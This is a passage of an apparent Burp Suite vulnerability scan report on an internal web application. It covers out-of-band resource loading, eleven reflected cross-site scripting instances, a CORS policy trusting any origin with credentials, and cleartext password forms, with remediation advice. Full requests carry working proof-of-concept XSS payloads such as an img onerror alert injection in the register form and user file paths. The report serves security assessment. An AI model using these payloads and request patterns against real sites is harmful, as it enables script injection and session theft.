You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary out-of-band resource load is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures. These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter. You should also ensure that content retrieved from other systems is processed in a safe manner, with the usual precautions that are applicable when processing input from direct incoming web requests.

If the ability to trigger arbitrary out-of-band resource load is not intended behavior, then you should implement a whitelist of permitted URLs, and block requests to URLs that do not appear on this whitelist.

References

Request 1

GET /contactus.php?f=http%3a%2f%2fa9k2e37z36j226d1tfh328gcv31v3jt7kuaiz.burpcollaborator.net%2f%3fcontact.txt HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:52 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1611
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
<td>&lt;html&gt;&lt;body&gt;kxtlooz8obw3n86ggdx6w7zjkugigjfigz&lt;/body&gt;&lt;/html&gt;</td>
...[SNIP]...

Collaborator HTTP interaction

The Collaborator server received an HTTP request.

The request was received from IP address 128.39.113.1 at 2017-nov-08 11:47:52 UTC.

Request to Collaborator

GET /?contact.txt HTTP/1.0
Host: a9k2e37z36j226d1tfh328gcv31v3jt7kuaiz.burpcollaborator.net
Connection: close

Response from Collaborator

HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 60

<html><body>kxtlooz8obw3n86ggdx6w7zjkugigjfigz</body></html>
1.5. Cross-site scripting (reflected)
Previous  Next

There are 11 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

References



1.5.1. http://10.250.200.5:81/register [username parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /register

Issue detail

The value of the username request parameter is copied into the HTML document as plain text between tags. The payload ar4wi<img src=a onerror=alert(1)>tjjqg was submitted in the username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

POST /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/register
Content-Type: multipart/form-data; boundary=--------952112201
Content-Length: 965
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

----------952112201
Content-Disposition: form-data; name="password"


----------952112201
Content-Disposition: form-data; name="website"


----------952112201
Content-Disposition: form-data;
...[SNIP]...
ntent-Disposition: form-data; name="pgpid"


----------952112201
Content-Disposition: form-data; name="primaryschool"


----------952112201
Content-Disposition: form-data; name="username"

ar4wi<img src=a onerror=alert(1)>tjjqg
----------952112201
Content-Disposition: form-data; name="highschool"


----------952112201--

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:39 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2455
Connection: close
Content-Type: text/html; charset=UTF-8

array (
0 => 'ar4wi<img src=a onerror=alert(1)>tjjqg',
1 => '',
2 => '',
3 => '',
4 => '',
5 => '',
6 => '',
7 => '',
)Error: User creation failed<!DOCTYPE html>
<html lang="en">

<he
...[SNIP]...
1.5.2. http://10.250.200.5:81/user/jyoti.ermine/key.asc [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/key.asc

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload kd6zj<img src=a onerror=alert(1)>wl3nl was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/jyoti.ermine/key.asckd6zj%3cimg%20src%3da%20onerror%3dalert(1)%3ewl3nl HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:06:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 82
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part key.asckd6zj<img src=a onerror=alert(1)>wl3nl
1.5.3. http://10.250.200.5:81/user/jyoti.ermine/me.jpg [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/me.jpg

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload lbfv1<img src=a onerror=alert(1)>ysenk was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/jyoti.ermine/me.jpglbfv1%3cimg%20src%3da%20onerror%3dalert(1)%3eysenk HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:06:46 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 81
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part me.jpglbfv1<img src=a onerror=alert(1)>ysenk
1.5.4. http://10.250.200.5:81/user/marge.aphrodite/key.asc [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/key.asc

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload tuhe6<img src=a onerror=alert(1)>tv7tx was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/marge.aphrodite/key.asctuhe6%3cimg%20src%3da%20onerror%3dalert(1)%3etv7tx HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:15:19 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 82
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part key.asctuhe6<img src=a onerror=alert(1)>tv7tx
1.5.5. http://10.250.200.5:81/user/marge.aphrodite/me.jpg [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/me.jpg

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload dlykp<img src=a onerror=alert(1)>c18sg was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/marge.aphrodite/me.jpgdlykp%3cimg%20src%3da%20onerror%3dalert(1)%3ec18sg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:19:49 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 81
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part me.jpgdlykp<img src=a onerror=alert(1)>c18sg
1.5.6. http://10.250.200.5:81/user/rica.orpah/key.asc [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/key.asc

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload u55va<img src=a onerror=alert(1)>gkymr was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/rica.orpah/key.ascu55va%3cimg%20src%3da%20onerror%3dalert(1)%3egkymr HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:28:24 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 82
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part key.ascu55va<img src=a onerror=alert(1)>gkymr
1.5.7. http://10.250.200.5:81/user/rica.orpah/me.jpg [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/me.jpg

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload z619j<img src=a onerror=alert(1)>yxar1 was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/rica.orpah/me.jpgz619j%3cimg%20src%3da%20onerror%3dalert(1)%3eyxar1 HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:28:28 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 81
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part me.jpgz619j<img src=a onerror=alert(1)>yxar1
1.5.8. http://10.250.200.5:81/user/ricca.gilud/key.asc [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/key.asc

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload e2liw<img src=a onerror=alert(1)>qz3ab was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/ricca.gilud/key.asce2liw%3cimg%20src%3da%20onerror%3dalert(1)%3eqz3ab HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:28:36 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 82
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part key.asce2liw<img src=a onerror=alert(1)>qz3ab
1.5.9. http://10.250.200.5:81/user/ricca.gilud/me.jpg [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/me.jpg

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload h8z7a<img src=a onerror=alert(1)>vlc45 was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/ricca.gilud/me.jpgh8z7a%3cimg%20src%3da%20onerror%3dalert(1)%3evlc45 HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:31:55 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 81
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part me.jpgh8z7a<img src=a onerror=alert(1)>vlc45
1.5.10. http://10.250.200.5:81/user/stephi.fonda/key.asc [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/key.asc

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload ea6kp<img src=a onerror=alert(1)>ct53e was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/stephi.fonda/key.ascea6kp%3cimg%20src%3da%20onerror%3dalert(1)%3ect53e HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:40:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 82
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part key.ascea6kp<img src=a onerror=alert(1)>ct53e
1.5.11. http://10.250.200.5:81/user/stephi.fonda/me.jpg [URL path filename]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/me.jpg

Issue detail

The value of the URL path filename is copied into the HTML document as plain text between tags. The payload dplwp<img src=a onerror=alert(1)>s4oqf was submitted in the URL path filename. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request 1

GET /user/stephi.fonda/me.jpgdplwp%3cimg%20src%3da%20onerror%3dalert(1)%3es4oqf HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:40:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 81
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 404 Unknown controller-part me.jpgdplwp<img src=a onerror=alert(1)>s4oqf
1.6. Cross-origin resource sharing: arbitrary origin trusted
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-json/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://pzmsygxefydq.com

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Issue background

An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.

Trusting arbitrary origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk.

If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information. Even if it does not, attackers may be able to bypass any IP-based access controls by proxying through users' browsers.

Issue remediation

Rather than using a wildcard or programatically verifying supplied origins, use a whitelist of trusted domains.

References

Request 1

GET /wp-json/ HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+
Origin: http://pzmsygxefydq.com

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:55 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
X-Robots-Tag: noindex
Link: <http://10.250.200.5/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization
Allow: GET
Access-Control-Allow-Origin: http://pzmsygxefydq.com
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Credentials: true
Content-Length: 998
Connection: close
Content-Type: application/json; charset=UTF-8

{"name":"Fairweather & sons","description":"Just another WordPress site","url":"http:\/\/10.250.200.5","home":"http:\/\/10.250.200.5","namespaces":["oembed\/1.0"],"authentication":[],"routes":{"\/":{"
...[SNIP]...
1.7. Cleartext submission of password
Previous  Next

There are 4 instances of this issue:

Issue background

Some applications transmit passwords over unencrypted connections, making them vulnerable to interception. To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

Issue remediation

Applications should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.



1.7.1. http://10.250.200.5/wp-login.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /wp-login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request 1

GET /wp-login.php HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:08 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2193
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
</h1>
   
<form name="loginform" id="loginform" action="http://10.250.200.5/wp-login.php" method="post">
   <p>
...[SNIP]...
<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label>
...[SNIP]...
1.7.2. http://10.250.200.5:81/login
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request 1

GET /login HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:59 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 882
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="/css/style.css" rel="st
...[SNIP]...
<body>
<form method="post">
<input type="text" name="username" />
<input type="password" name="password" />
<input type="submit" value="Log in">
...[SNIP]...
1.7.3. http://10.250.200.5:81/register
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

